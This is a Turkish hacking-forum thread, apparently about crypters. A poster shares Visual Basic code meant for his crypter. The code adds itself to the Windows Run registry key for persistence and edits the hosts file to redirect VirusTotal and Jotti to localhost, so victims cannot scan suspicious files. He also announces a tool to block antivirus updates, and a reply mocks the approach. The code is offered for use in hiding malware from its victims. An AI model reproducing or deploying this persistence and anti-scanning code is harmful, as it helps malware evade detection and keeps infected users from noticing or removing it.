- Konuyu başlatan
Tabii canım, kullanıcı virustotal'e giremeyince şüphelenmiyecek, öylece devam edecek..
server a ekliyor hem şimdi bomba bir çalışmam var antivirus guncellemelritni engelleyen program hazırlıyorum bitince atarım
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
Tabii canım, kullanıcı virustotal'e giremeyince şüphelenmiyecek, öylece devam edecek..
biliyorum herkes crypteri patlıyor diye korkuyor şimdi bende kendi crypterime eklediğin bir takım kodlar var ben dll olarak ekledim şuanlık forumda deneme aşamasına aldım ve kullanıyorum özelliği kendini startup olarak atıyor ve virus total ve jottiyi engelliyor kendini ototmatik başlangıça attığı için kullanıcı kaldırsa bile başlangıçta tekrar engelliyor
not: program yönetici olarak çalıştırılmalıdır
![]()
Kod:Private Sub Form_Load() Dim Startup_key As String Startup_key = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" Dim Reg As Object Set Reg = CreateObject("wscript.shell") Reg.RegWrite Startup_key & App.EXEName, App.Path & "\" & App.EXEName & ".exe" Dim dizin As String Dim yerayır As String Dim site As String Dim site2 As String dizin = Environ("windir") & "\system32\drivers\etc\hosts" Open dizin For Binary As 1 yerayır = Space(FileLen(dizin)) Get 1, , yerayır Close 1 site = vbNewLine & "127.0.0.1 www.virustotal.com " site2 = vbNewLine & "127.0.0.1 www.jooti.com " Open dizin For Binary As 1 Put 1, , yerayır & site Close 1 End Sub